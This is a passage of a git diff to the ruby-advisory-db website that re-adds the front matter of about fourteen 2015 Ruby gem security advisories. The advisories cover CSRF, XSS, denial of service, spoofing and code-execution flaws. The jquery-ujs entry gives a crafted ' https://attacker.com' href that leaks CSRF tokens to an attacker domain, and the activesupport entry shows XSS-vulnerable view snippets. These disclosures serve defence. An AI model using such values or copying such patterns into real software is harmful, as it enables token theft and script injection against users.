+    - https://github.com/rubysec/ruby-advisory-db/commit/19a8fc075a6cc0702f978219c88d97c666fecdbd
+---
diff --git a/advisories/_posts/2015-06-05-CVE-2015-2963.md b/advisories/_posts/2015-06-05-CVE-2015-2963.md
index ffd44c4b..7efc1a79 100644
--- a/advisories/_posts/2015-06-05-CVE-2015-2963.md
+++ b/advisories/_posts/2015-06-05-CVE-2015-2963.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2015-2963 (paperclip): Paperclip Gem for Ruby vulnerable to content type
-  spoofing'
-comments: false
-categories:
-- paperclip
-advisory:
-  gem: paperclip
-  cve: 2015-2963
-  ghsa: 6jvm-3j5h-79f6
-  url: https://robots.thoughtbot.com/paperclip-security-release
-  title: Paperclip Gem for Ruby vulnerable to content type spoofing
-  date: 2015-06-05
-  description: |
-    There is an issue where if an HTML file is uploaded with a .html
-    extension, but the content type is listed as being `image/jpeg`, this
-    will bypass a validation checking for images. But it will also pass the
-    spoof check, because a file named .html and containing actual HTML
-    passes the spoof check.
-  cvss_v2: 4.3
-  patched_versions:
-  - ">= 4.2.2"
----
+---
+layout: advisory
+title: 'CVE-2015-2963 (paperclip): Paperclip Gem for Ruby vulnerable to content type
+  spoofing'
+comments: false
+categories:
+- paperclip
+advisory:
+  gem: paperclip
+  cve: 2015-2963
+  ghsa: 6jvm-3j5h-79f6
+  url: https://robots.thoughtbot.com/paperclip-security-release
+  title: Paperclip Gem for Ruby vulnerable to content type spoofing
+  date: 2015-06-05
+  description: |
+    There is an issue where if an HTML file is uploaded with a .html
+    extension, but the content type is listed as being `image/jpeg`, this
+    will bypass a validation checking for images. But it will also pass the
+    spoof check, because a file named .html and containing actual HTML
+    passes the spoof check.
+  cvss_v2: 4.3
+  patched_versions:
+  - ">= 4.2.2"
+---
diff --git a/advisories/_posts/2015-06-08-CVE-2015-4020.md b/advisories/_posts/2015-06-08-CVE-2015-4020.md
index f383325c..3348cb5b 100644
--- a/advisories/_posts/2015-06-08-CVE-2015-4020.md
+++ b/advisories/_posts/2015-06-08-CVE-2015-4020.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2015-4020 (rubygems-update): RubyGems remote_fetcher.rb api_endpoint()
-  Function Missing SRV Record Hostname Validation Request Hijacking'
-comments: false
-categories:
-- rubygems-update
-- rubygems
-advisory:
-  gem: rubygems-update
-  library: rubygems
-  cve: 2015-4020
-  ghsa: qv62-xfj6-32xm
-  url: https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-009/?fid=6478
-  title: RubyGems remote_fetcher.rb api_endpoint() Function Missing SRV Record Hostname
-    Validation Request Hijacking
-  date: 2015-06-08
-  description: |
-    RubyGems contains a flaw in the api_endpoint() function in remote_fetcher.rb
-    that is triggered when handling hostnames in SRV records. With a specially
-    crafted response, a context-dependent attacker may conduct DNS hijacking
-    attacks. This vulnerability is due to an incomplete fix for CVE-2015-3900,
-    which allowed redirection to an arbitrary gem server in any security domain.
-  cvss_v2: 5.0
-  patched_versions:
-  - "~> 2.0.17"
-  - "~> 2.2.5"
-  - ">= 2.4.8"
----
+---
+layout: advisory
+title: 'CVE-2015-4020 (rubygems-update): RubyGems remote_fetcher.rb api_endpoint()
+  Function Missing SRV Record Hostname Validation Request Hijacking'
+comments: false
+categories:
+- rubygems-update
+- rubygems
+advisory:
+  gem: rubygems-update
+  library: rubygems
+  cve: 2015-4020
+  ghsa: qv62-xfj6-32xm
+  url: https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-009/?fid=6478
+  title: RubyGems remote_fetcher.rb api_endpoint() Function Missing SRV Record Hostname
+    Validation Request Hijacking
+  date: 2015-06-08
+  description: |
+    RubyGems contains a flaw in the api_endpoint() function in remote_fetcher.rb
+    that is triggered when handling hostnames in SRV records. With a specially
+    crafted response, a context-dependent attacker may conduct DNS hijacking
+    attacks. This vulnerability is due to an incomplete fix for CVE-2015-3900,
+    which allowed redirection to an arbitrary gem server in any security domain.
+  cvss_v2: 5.0
+  patched_versions:
+  - "~> 2.0.17"
+  - "~> 2.2.5"
+  - ">= 2.4.8"
+---
diff --git a/advisories/_posts/2015-06-16-CVE-2015-1840.md b/advisories/_posts/2015-06-16-CVE-2015-1840.md
index 28cb4603..fbd07dd2 100644
--- a/advisories/_posts/2015-06-16-CVE-2015-1840.md
+++ b/advisories/_posts/2015-06-16-CVE-2015-1840.md
@@ -1,43 +1,43 @@
----
-layout: advisory
-title: 'CVE-2015-1840 (jquery-ujs): CSRF Vulnerability in jquery-ujs'
-comments: false
-categories:
-- jquery-ujs
-advisory:
-  gem: jquery-ujs
-  cve: 2015-1840
-  ghsa: 4whc-pp4x-9pf3
-  url: https://groups.google.com/forum/#!topic/ruby-security-ann/XIZPbobuwaY
-  title: CSRF Vulnerability in jquery-ujs
-  date: 2015-06-16
-  description: |
-    In the scenario where an attacker might be able to control the href attribute
-    of an anchor tag or the action attribute of a form tag that will trigger a
-    POST action, the attacker can set the href or action to
-    " https://attacker.com" (note the leading space) that will be passed to
-    JQuery, who will see this as a same origin request, and send the user's CSRF
-    token to the attacker domain.
-
-    To work around this problem, change code that allows users to control the
-    href attribute of an anchor tag or the action attribute of a form tag to
-    filter the user parameters.
-
-    For example, code like this:
-
-      link_to params
-
-    to code like this:
-
-      link_to filtered_params
-
-      def filtered_params
-        \# Filter just the parameters that you trust
-      end
-
-    See also:
-      - http://blog.honeybadger.io/understanding-the-rails-jquery-csrf-vulnerability-cve-2015-1840/
-  cvss_v2: 5.0
-  patched_versions:
-  - ">= 1.0.4"
----
+---
+layout: advisory
+title: 'CVE-2015-1840 (jquery-ujs): CSRF Vulnerability in jquery-ujs'
+comments: false
+categories:
+- jquery-ujs
+advisory:
+  gem: jquery-ujs
+  cve: 2015-1840
+  ghsa: 4whc-pp4x-9pf3
+  url: https://groups.google.com/forum/#!topic/ruby-security-ann/XIZPbobuwaY
+  title: CSRF Vulnerability in jquery-ujs
+  date: 2015-06-16
+  description: |
+    In the scenario where an attacker might be able to control the href attribute
+    of an anchor tag or the action attribute of a form tag that will trigger a
+    POST action, the attacker can set the href or action to
+    " https://attacker.com" (note the leading space) that will be passed to
+    JQuery, who will see this as a same origin request, and send the user's CSRF
+    token to the attacker domain.
+
+    To work around this problem, change code that allows users to control the
+    href attribute of an anchor tag or the action attribute of a form tag to
+    filter the user parameters.
+
+    For example, code like this:
+
+      link_to params
+
+    to code like this:
+
+      link_to filtered_params
+
+      def filtered_params
+        \# Filter just the parameters that you trust
+      end
+
+    See also:
+      - http://blog.honeybadger.io/understanding-the-rails-jquery-csrf-vulnerability-cve-2015-1840/
+  cvss_v2: 5.0
+  patched_versions:
+  - ">= 1.0.4"
+---
diff --git a/advisories/_posts/2015-06-16-CVE-2015-3224.md b/advisories/_posts/2015-06-16-CVE-2015-3224.md
index 1a719657..8c7fe385 100644
--- a/advisories/_posts/2015-06-16-CVE-2015-3224.md
+++ b/advisories/_posts/2015-06-16-CVE-2015-3224.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2015-3224 (web-console): IP whitelist bypass in Web Console'
-comments: false
-categories:
-- web-console
-advisory:
-  gem: web-console
-  cve: 2015-3224
-  ghsa: 67j6-xv27-w6ww
-  url: https://groups.google.com/forum/#!topic/ruby-security-ann/lzmz9_ijUFw
-  title: IP whitelist bypass in Web Console
-  date: 2015-06-16
-  description: |
-    Specially crafted remote requests can spoof their origin, bypassing the IP whitelist, in any environment where Web Console is enabled (development and test, by default).
-
-    Users whose application is only accessible from localhost (as is the default behaviour in Rails 4.2) are not affected, unless a local proxy is involved.
-
-    All affected users should either upgrade or use one of the work arounds immediately.
-
-    To work around this issue, turn off web-console in all environments, by removing/commenting it from the application's Gemfile.
-  patched_versions:
-  - ">= 2.1.3"
----
+---
+layout: advisory
+title: 'CVE-2015-3224 (web-console): IP whitelist bypass in Web Console'
+comments: false
+categories:
+- web-console
+advisory:
+  gem: web-console
+  cve: 2015-3224
+  ghsa: 67j6-xv27-w6ww
+  url: https://groups.google.com/forum/#!topic/ruby-security-ann/lzmz9_ijUFw
+  title: IP whitelist bypass in Web Console
+  date: 2015-06-16
+  description: |
+    Specially crafted remote requests can spoof their origin, bypassing the IP whitelist, in any environment where Web Console is enabled (development and test, by default).
+
+    Users whose application is only accessible from localhost (as is the default behaviour in Rails 4.2) are not affected, unless a local proxy is involved.
+
+    All affected users should either upgrade or use one of the work arounds immediately.
+
+    To work around this issue, turn off web-console in all environments, by removing/commenting it from the application's Gemfile.
+  patched_versions:
+  - ">= 2.1.3"
+---
diff --git a/advisories/_posts/2015-06-16-CVE-2015-3225.md b/advisories/_posts/2015-06-16-CVE-2015-3225.md
index 217bba83..74063412 100644
--- a/advisories/_posts/2015-06-16-CVE-2015-3225.md
+++ b/advisories/_posts/2015-06-16-CVE-2015-3225.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2015-3225 (rack): Potential Denial of Service Vulnerability in Rack'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2015-3225
-  ghsa: rgr4-9jh5-j4j6
-  url: https://groups.google.com/forum/#!topic/ruby-security-ann/gcUbICUmKMc
-  title: Potential Denial of Service Vulnerability in Rack
-  date: 2015-06-16
-  description: |
-    Carefully crafted requests can cause a `SystemStackError` and potentially
-    cause a denial of service attack.
-
-    All users running an affected release should upgrade.
-  patched_versions:
-  - ">= 1.6.2"
-  - "~> 1.5.4"
-  - "~> 1.4.6"
----
+---
+layout: advisory
+title: 'CVE-2015-3225 (rack): Potential Denial of Service Vulnerability in Rack'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2015-3225
+  ghsa: rgr4-9jh5-j4j6
+  url: https://groups.google.com/forum/#!topic/ruby-security-ann/gcUbICUmKMc
+  title: Potential Denial of Service Vulnerability in Rack
+  date: 2015-06-16
+  description: |
+    Carefully crafted requests can cause a `SystemStackError` and potentially
+    cause a denial of service attack.
+
+    All users running an affected release should upgrade.
+  patched_versions:
+  - ">= 1.6.2"
+  - "~> 1.5.4"
+  - "~> 1.4.6"
+---
diff --git a/advisories/_posts/2015-06-16-CVE-2015-3226.md b/advisories/_posts/2015-06-16-CVE-2015-3226.md
index 9074ed63..21d256e9 100644
--- a/advisories/_posts/2015-06-16-CVE-2015-3226.md
+++ b/advisories/_posts/2015-06-16-CVE-2015-3226.md
@@ -1,58 +1,58 @@
----
-layout: advisory
-title: 'CVE-2015-3226 (activesupport): XSS Vulnerability in ActiveSupport::JSON.encode'
-comments: false
-categories:
-- activesupport
-- rails
-advisory:
-  gem: activesupport
-  framework: rails
-  cve: 2015-3226
-  ghsa: vxvp-4xwc-jpp6
-  url: https://groups.google.com/forum/#!topic/ruby-security-ann/7VlB_pck3hU
-  title: XSS Vulnerability in ActiveSupport::JSON.encode
-  date: 2015-06-16
-  description: |
-    When a `Hash` containing user-controlled data is encode as JSON (either through
-    `Hash#to_json` or `ActiveSupport::JSON.encode`), Rails does not perform adequate
-    escaping that matches the guarantee implied by the `escape_html_entities_in_json`
-    option (which is enabled by default). If this resulting JSON string is subsequently
-    inserted directly into an HTML page, the page will be vulnerable to XSS attacks.
-
-    For example, the following code snippet is vulnerable to this attack:
-
-        <%= javascript_tag "var data = #{user_supplied_data.to_json};" %>
-
-    Similarly, the following is also vulnerable:
-
-        <script>
-          var data = <%= ActiveSupport::JSON.encode(user_supplied_data).html_safe %>;
-        </script>
-
-    All applications that renders JSON-encoded strings that contains user-controlled
-    data in their views should either upgrade to one of the FIXED versions or use
-    the suggested workaround immediately.
-
-    Workarounds
-    -----------
-    To work around this problem add an initializer with the following code:
-
-      module ActiveSupport
-        module JSON
-          module Encoding
-            private
-            class EscapedString
-              def to_s
-                self
-              end
-            end
-          end
-        end
-      end
-  unaffected_versions:
-  - "< 4.1.0"
-  patched_versions:
-  - ">= 4.2.2"
-  - "~> 4.1.11"
----
+---
+layout: advisory
+title: 'CVE-2015-3226 (activesupport): XSS Vulnerability in ActiveSupport::JSON.encode'
+comments: false
+categories:
+- activesupport
+- rails
+advisory:
+  gem: activesupport
+  framework: rails
+  cve: 2015-3226
+  ghsa: vxvp-4xwc-jpp6
+  url: https://groups.google.com/forum/#!topic/ruby-security-ann/7VlB_pck3hU
+  title: XSS Vulnerability in ActiveSupport::JSON.encode
+  date: 2015-06-16
+  description: |
+    When a `Hash` containing user-controlled data is encode as JSON (either through
+    `Hash#to_json` or `ActiveSupport::JSON.encode`), Rails does not perform adequate
+    escaping that matches the guarantee implied by the `escape_html_entities_in_json`
+    option (which is enabled by default). If this resulting JSON string is subsequently
+    inserted directly into an HTML page, the page will be vulnerable to XSS attacks.
+
+    For example, the following code snippet is vulnerable to this attack:
+
+        <%= javascript_tag "var data = #{user_supplied_data.to_json};" %>
+
+    Similarly, the following is also vulnerable:
+
+        <script>
+          var data = <%= ActiveSupport::JSON.encode(user_supplied_data).html_safe %>;
+        </script>
+
+    All applications that renders JSON-encoded strings that contains user-controlled
+    data in their views should either upgrade to one of the FIXED versions or use
+    the suggested workaround immediately.
+
+    Workarounds
+    -----------
+    To work around this problem add an initializer with the following code:
+
+      module ActiveSupport
+        module JSON
+          module Encoding
+            private
+            class EscapedString
+              def to_s
+                self
+              end
+            end
+          end
+        end
+      end
+  unaffected_versions:
+  - "< 4.1.0"
+  patched_versions:
+  - ">= 4.2.2"
+  - "~> 4.1.11"
+---
diff --git a/advisories/_posts/2015-06-16-CVE-2015-3227.md b/advisories/_posts/2015-06-16-CVE-2015-3227.md
index c49fdcc4..501aa833 100644
--- a/advisories/_posts/2015-06-16-CVE-2015-3227.md
+++ b/advisories/_posts/2015-06-16-CVE-2015-3227.md
@@ -1,38 +1,38 @@
----
-layout: advisory
-title: 'CVE-2015-3227 (activesupport): Possible Denial of Service attack in Active
-  Support'
-comments: false
-categories:
-- activesupport
-- rails
-advisory:
-  gem: activesupport
-  framework: rails
-  cve: 2015-3227
-  ghsa: j96r-xvjq-r9pg
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/bahr2JLnxvk
-  title: Possible Denial of Service attack in Active Support
-  date: 2015-06-16
-  description: |
-    Specially crafted XML documents can cause applications to raise a
-    `SystemStackError` and potentially cause a denial of service attack.  This
-    only impacts applications using REXML or JDOM as their XML processor.  Other
-    XML processors that Rails supports are not impacted.
-
-    All users running an affected release should either upgrade or use one of the work arounds immediately.
-
-    Workarounds
-    -----------
-    Use an XML parser that is not impacted by this problem, such as Nokogiri or
-    LibXML.  You can change the processor like this:
-
-      ActiveSupport::XmlMini.backend = 'Nokogiri'
-
-    If you cannot change XML parsers, then adjust
-    `RUBY_THREAD_MACHINE_STACK_SIZE`.
-  patched_versions:
-  - ">= 4.2.2"
-  - "~> 4.1.11"
-  - "~> 3.2.22"
----
+---
+layout: advisory
+title: 'CVE-2015-3227 (activesupport): Possible Denial of Service attack in Active
+  Support'
+comments: false
+categories:
+- activesupport
+- rails
+advisory:
+  gem: activesupport
+  framework: rails
+  cve: 2015-3227
+  ghsa: j96r-xvjq-r9pg
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/bahr2JLnxvk
+  title: Possible Denial of Service attack in Active Support
+  date: 2015-06-16
+  description: |
+    Specially crafted XML documents can cause applications to raise a
+    `SystemStackError` and potentially cause a denial of service attack.  This
+    only impacts applications using REXML or JDOM as their XML processor.  Other
+    XML processors that Rails supports are not impacted.
+
+    All users running an affected release should either upgrade or use one of the work arounds immediately.
+
+    Workarounds
+    -----------
+    Use an XML parser that is not impacted by this problem, such as Nokogiri or
+    LibXML.  You can change the processor like this:
+
+      ActiveSupport::XmlMini.backend = 'Nokogiri'
+
+    If you cannot change XML parsers, then adjust
+    `RUBY_THREAD_MACHINE_STACK_SIZE`.
+  patched_versions:
+  - ">= 4.2.2"
+  - "~> 4.1.11"
+  - "~> 3.2.22"
+---
diff --git a/advisories/_posts/2015-06-16-CVE-2015-4619.md b/advisories/_posts/2015-06-16-CVE-2015-4619.md
index 8b3fe482..21d5b265 100644
--- a/advisories/_posts/2015-06-16-CVE-2015-4619.md
+++ b/advisories/_posts/2015-06-16-CVE-2015-4619.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2015-4619 (spina): Cross-site request forgery (CSRF) vulnerability in
-  Spina gem'
-comments: false
-categories:
-- spina
-advisory:
-  gem: spina
-  cve: 2015-4619
-  ghsa: 2hxv-mx8x-mcj9
-  url: http://www.openwall.com/lists/oss-security/2015/06/16/11
-  title: Cross-site request forgery (CSRF) vulnerability in Spina gem
-  date: 2015-06-16
-  description: |
-    "`Spina::ApplicationController` actions didn't have CSRF protection.
-    This causes a CSRF vulnerability across the entire engine which includes administrative
-    functionality such as creating users, changing passwords, and media management."
-  cvss_v3: 8.8
-  patched_versions:
-  - ">= 0.6.29"
-  related:
-    url:
-    - https://sca.analysiscenter.veracode.com/vulnerability-database/security/cross-site-request-forgery-csrf/ruby/sid-1686/summary
-    - https://github.com/rubysec/ruby-advisory-db/issues/238
----
+---
+layout: advisory
+title: 'CVE-2015-4619 (spina): Cross-site request forgery (CSRF) vulnerability in
+  Spina gem'
+comments: false
+categories:
+- spina
+advisory:
+  gem: spina
+  cve: 2015-4619
+  ghsa: 2hxv-mx8x-mcj9
+  url: http://www.openwall.com/lists/oss-security/2015/06/16/11
+  title: Cross-site request forgery (CSRF) vulnerability in Spina gem
+  date: 2015-06-16
+  description: |
+    "`Spina::ApplicationController` actions didn't have CSRF protection.
+    This causes a CSRF vulnerability across the entire engine which includes administrative
+    functionality such as creating users, changing passwords, and media management."
+  cvss_v3: 8.8
+  patched_versions:
+  - ">= 0.6.29"
+  related:
+    url:
+    - https://sca.analysiscenter.veracode.com/vulnerability-database/security/cross-site-request-forgery-csrf/ruby/sid-1686/summary
+    - https://github.com/rubysec/ruby-advisory-db/issues/238
+---
diff --git a/advisories/_posts/2015-06-22-CVE-2015-5147.md b/advisories/_posts/2015-06-22-CVE-2015-5147.md
index 14de4e1a..c96a2806 100644
--- a/advisories/_posts/2015-06-22-CVE-2015-5147.md
+++ b/advisories/_posts/2015-06-22-CVE-2015-5147.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2015-5147 (redcarpet): redcarpet Gem for Ruby html.c header_anchor() Function
-  Stack Overflow'
-comments: false
-categories:
-- redcarpet
-advisory:
-  gem: redcarpet
-  cve: 2015-5147
-  osvdb: 123859
-  ghsa: 7322-9mx6-5j2m
-  url: http://seclists.org/oss-sec/2015/q2/818
-  title: redcarpet Gem for Ruby html.c header_anchor() Function Stack Overflow
-  date: 2015-06-22
-  description: |
-    redcarpet Gem for Ruby contains a flaw that allows a stack overflow.
-    This flaw exists because the header_anchor() function in html.c uses
-    variable length arrays (VLA) without any range checking. This may
-    allow a remote attacker to execute arbitrary code.
-  cvss_v2: 7.5
-  unaffected_versions:
-  - "< 3.3.0"
-  patched_versions:
-  - ">= 3.3.2"
----
+---
+layout: advisory
+title: 'CVE-2015-5147 (redcarpet): redcarpet Gem for Ruby html.c header_anchor() Function
+  Stack Overflow'
+comments: false
+categories:
+- redcarpet
+advisory:
+  gem: redcarpet
+  cve: 2015-5147
+  osvdb: 123859
+  ghsa: 7322-9mx6-5j2m
+  url: http://seclists.org/oss-sec/2015/q2/818
+  title: redcarpet Gem for Ruby html.c header_anchor() Function Stack Overflow
+  date: 2015-06-22
+  description: |
+    redcarpet Gem for Ruby contains a flaw that allows a stack overflow.
+    This flaw exists because the header_anchor() function in html.c uses
+    variable length arrays (VLA) without any range checking. This may
+    allow a remote attacker to execute arbitrary code.
+  cvss_v2: 7.5
+  unaffected_versions:
+  - "< 3.3.0"
+  patched_versions:
+  - ">= 3.3.2"
+---
diff --git a/advisories/_posts/2015-06-30-OSVDB-124383.md b/advisories/_posts/2015-06-30-OSVDB-124383.md
index 46d0cfc9..df22d66e 100644
--- a/advisories/_posts/2015-06-30-OSVDB-124383.md
+++ b/advisories/_posts/2015-06-30-OSVDB-124383.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'OSVDB-124383 (ruby-saml): Ruby-Saml Gem is vulnerable to entity expansion
-  attacks'
-comments: false
-categories:
-- ruby-saml
-advisory:
-  gem: ruby-saml
-  osvdb: 124383
-  url: https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.0.0
-  title: Ruby-Saml Gem is vulnerable to entity expansion attacks
-  date: 2015-06-30
-  description: 'ruby-saml before 1.0.0 is vulnerable to entity expansion attacks.
-
-    '
-  cvss_v2: 3.9
-  patched_versions:
-  - ">= 1.0.0"
-  related:
-    url:
-    - https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.0.0
-    - https://github.com/SAML-Toolkits/ruby-saml/pull/247
-    - https://security.snyk.io/vuln/SNYK-RUBY-RUBYSAML-20232
-    - https://github.com/onelogin/ruby-saml/pull/247
----
+---
+layout: advisory
+title: 'OSVDB-124383 (ruby-saml): Ruby-Saml Gem is vulnerable to entity expansion
+  attacks'
+comments: false
+categories:
+- ruby-saml
+advisory:
+  gem: ruby-saml
+  osvdb: 124383
+  url: https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.0.0
+  title: Ruby-Saml Gem is vulnerable to entity expansion attacks
+  date: 2015-06-30
+  description: 'ruby-saml before 1.0.0 is vulnerable to entity expansion attacks.
+
+    '
+  cvss_v2: 3.9
+  patched_versions:
+  - ">= 1.0.0"
+  related:
+    url:
+    - https://github.com/SAML-Toolkits/ruby-saml/releases/tag/v1.0.0
+    - https://github.com/SAML-Toolkits/ruby-saml/pull/247
+    - https://security.snyk.io/vuln/SNYK-RUBY-RUBYSAML-20232
+    - https://github.com/onelogin/ruby-saml/pull/247
+---
diff --git a/advisories/_posts/2015-07-06-OSVDB-125675.md b/advisories/_posts/2015-07-06-OSVDB-125675.md
index 5f025de6..99358cfe 100644
--- a/advisories/_posts/2015-07-06-OSVDB-125675.md
+++ b/advisories/_posts/2015-07-06-OSVDB-125675.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'OSVDB-125675 (sidekiq): Sidekiq Gem for Ruby Multiple Unspecified CSRF'
-comments: false
-categories:
-- sidekiq
-advisory:
-  gem: sidekiq
-  osvdb: 125675
-  url: https://seclists.org/oss-sec/2015/q3/267
-  title: Sidekiq Gem for Ruby Multiple Unspecified CSRF
-  date: 2015-07-06
-  description: 'Sidekiq::Web lacks CSRF protection
-
-    '
-  patched_versions:
-  - ">= 3.4.2"
-  related:
-    url:
-    - https://seclists.org/oss-sec/2015/q3/267
-    - https://github.com/mperham/sidekiq/pull/2422
-    - https://github.com/sidekiq/sidekiq/commit/cf3c43b2410c4573e05ac119494e41115f4140ad
-    - https://security.snyk.io/vuln/SNYK-RUBY-SIDEKIQ-20233
----
+---
+layout: advisory
+title: 'OSVDB-125675 (sidekiq): Sidekiq Gem for Ruby Multiple Unspecified CSRF'
+comments: false
+categories:
+- sidekiq
+advisory:
+  gem: sidekiq
+  osvdb: 125675
+  url: https://seclists.org/oss-sec/2015/q3/267
+  title: Sidekiq Gem for Ruby Multiple Unspecified CSRF
+  date: 2015-07-06
+  description: 'Sidekiq::Web lacks CSRF protection
+
+    '
+  patched_versions:
+  - ">= 3.4.2"
+  related:
+    url:
+    - https://seclists.org/oss-sec/2015/q3/267
+    - https://github.com/mperham/sidekiq/pull/2422
+    - https://github.com/sidekiq/sidekiq/commit/cf3c43b2410c4573e05ac119494e41115f4140ad
+    - https://security.snyk.io/vuln/SNYK-RUBY-SIDEKIQ-20233
+---
diff --git a/advisories/_posts/2015-07-13-CVE-2017-11173.md b/advisories/_posts/2015-07-13-CVE-2017-11173.md
index 2e30997e..237d8eac 100644
--- a/advisories/_posts/2015-07-13-CVE-2017-11173.md
+++ b/advisories/_posts/2015-07-13-CVE-2017-11173.md
@@ -1,30 +1,30 @@
----
-layout: advisory
-title: 'CVE-2017-11173 (rack-cors): rack-cors Gem Missing Anchor permits unauthorized
-  CORS requests'
-comments: false
-categories:
-- rack-cors
-advisory:
-  gem: rack-cors
-  cve: 2017-11173
-  ghsa: 2j9c-9vmv-7m39
-  url: https://github.com/cyu/rack-cors/issues/86
-  title: rack-cors Gem Missing Anchor permits unauthorized CORS requests
-  date: 2015-07-13
-  description: |
-    Missing anchor in generated regex for rack-cors before 0.4.1
-    allows a malicious third-party site to perform CORS requests.
-    If the configuration were intended to allow only the trusted
-    example.com domain name and not the malicious example.net domain name,
-    then example.com.example.net (as well as example.com-example.net) would
-    be inadvertently allowed.
-  cvss_v2: 6.8
-  cvss_v3: 8.8
-  patched_versions:
-  - ">= 0.4.1"
-  related:
-    url:
-    - https://github.com/cyu/rack-cors/issues/86
-    - http://seclists.org/fulldisclosure/2017/Jul/22
----
+---
+layout: advisory
+title: 'CVE-2017-11173 (rack-cors): rack-cors Gem Missing Anchor permits unauthorized
+  CORS requests'
+comments: false
+categories:
+- rack-cors
+advisory:
+  gem: rack-cors
+  cve: 2017-11173
+  ghsa: 2j9c-9vmv-7m39
+  url: https://github.com/cyu/rack-cors/issues/86
+  title: rack-cors Gem Missing Anchor permits unauthorized CORS requests
+  date: 2015-07-13
+  description: |
+    Missing anchor in generated regex for rack-cors before 0.4.1
+    allows a malicious third-party site to perform CORS requests.
+    If the configuration were intended to allow only the trusted
+    example.com domain name and not the malicious example.net domain name,
+    then example.com.example.net (as well as example.com-example.net) would
+    be inadvertently allowed.
+  cvss_v2: 6.8
+  cvss_v3: 8.8
+  patched_versions:
+  - ">= 0.4.1"
+  related:
+    url:
+    - https://github.com/cyu/rack-cors/issues/86
+    - http://seclists.org/fulldisclosure/2017/Jul/22
+---
diff --git a/advisories/_posts/2015-07-17-OSVDB-126331.md b/advisories/_posts/2015-07-17-OSVDB-126331.md
index 2546d521..5736324a 100644
--- a/advisories/_posts/2015-07-17-OSVDB-126331.md
+++ b/advisories/_posts/2015-07-17-OSVDB-126331.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'OSVDB-126331 (sidekiq-pro): Sidekiq Pro Gem for Ruby CSRF in Job Filtering'
-comments: false
-categories:
-- sidekiq-pro
-advisory:
-  gem: sidekiq-pro
-  osvdb: 126331
-  url: https://github.com/sidekiq/sidekiq/blob/main/Pro-Changes.md#206-193
-  title: Sidekiq Pro Gem for Ruby CSRF in Job Filtering
-  date: 2015-07-17
-  description: |
-    Sidekiq::Web job filtering lacks CSRF protection.
-    This issue is related to OSVDB-125675.
-  patched_versions:
-  - "~> 1.9.3"
-  - ">= 2.0.6"
-  related:
-    osvdb:
-    - 125675
-    url:
-    - https://github.com/sidekiq/sidekiq/blob/main/Pro-Changes.md#206-193
-    - https://github.com/sidekiq/sidekiq/issues/2442
-    - https://github.com/sidekiq/sidekiq/issues/2467
-    - https://github.com/rubysec/ruby-advisory-db/pull/201
-    - https://security.snyk.io/vuln/SNYK-RUBY-SIDEKIQPRO-20234
----
+---
+layout: advisory
+title: 'OSVDB-126331 (sidekiq-pro): Sidekiq Pro Gem for Ruby CSRF in Job Filtering'
+comments: false
+categories:
+- sidekiq-pro
+advisory:
+  gem: sidekiq-pro
+  osvdb: 126331
+  url: https://github.com/sidekiq/sidekiq/blob/main/Pro-Changes.md#206-193
+  title: Sidekiq Pro Gem for Ruby CSRF in Job Filtering
+  date: 2015-07-17
+  description: |
+    Sidekiq::Web job filtering lacks CSRF protection.
+    This issue is related to OSVDB-125675.
+  patched_versions:
+  - "~> 1.9.3"
+  - ">= 2.0.6"
+  related:
+    osvdb:
+    - 125675
+    url:
+    - https://github.com/sidekiq/sidekiq/blob/main/Pro-Changes.md#206-193
+    - https://github.com/sidekiq/sidekiq/issues/2442
+    - https://github.com/sidekiq/sidekiq/issues/2467
+    - https://github.com/rubysec/ruby-advisory-db/pull/201
+    - https://security.snyk.io/vuln/SNYK-RUBY-SIDEKIQPRO-20234
+---
diff --git a/advisories/_posts/2015-07-20-OSVDB-125701.md b/advisories/_posts/2015-07-20-OSVDB-125701.md
index 8884d8a4..e84658de 100644
--- a/advisories/_posts/2015-07-20-OSVDB-125701.md
+++ b/advisories/_posts/2015-07-20-OSVDB-125701.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'OSVDB-125701 (spree): Spree RABL templates rendering allows Arbitrary Code
-  Execution and File Disclosure'
-comments: false
-categories:
-- spree
-advisory:
-  gem: spree
-  osvdb: 125701
-  url: https://web.archive.org/web/20160331140223/https://spreecommerce.com/blog/security-updates-2015-7-20
-  title: Spree RABL templates rendering allows Arbitrary Code Execution and File Disclosure
-  date: 2015-07-20
-  description: |
-    Spree contains a flaw where the rendering of arbitrary RABL templates
-    allows for execution arbitrary files on the host system, as well as
-    disclosing the existence of files on the system.
-  patched_versions:
-  - "~> 2.2.12"
-  - "~> 2.3.11"
-  - "~> 2.4.8"
-  - ">= 3.0.2"
-  related:
-    url:
-    - https://web.archive.org/web/20160331140223/https://spreecommerce.com/blog/security-updates-2015-7-20
-    - https://github.com/rubysec/bundler-audit/issues/106
----
+---
+layout: advisory
+title: 'OSVDB-125701 (spree): Spree RABL templates rendering allows Arbitrary Code
+  Execution and File Disclosure'
+comments: false
+categories:
+- spree
+advisory:
+  gem: spree
+  osvdb: 125701
+  url: https://web.archive.org/web/20160331140223/https://spreecommerce.com/blog/security-updates-2015-7-20
+  title: Spree RABL templates rendering allows Arbitrary Code Execution and File Disclosure
+  date: 2015-07-20
+  description: |
+    Spree contains a flaw where the rendering of arbitrary RABL templates
+    allows for execution arbitrary files on the host system, as well as
+    disclosing the existence of files on the system.
+  patched_versions:
+  - "~> 2.2.12"
+  - "~> 2.3.11"
+  - "~> 2.4.8"
+  - ">= 3.0.2"
+  related:
+    url:
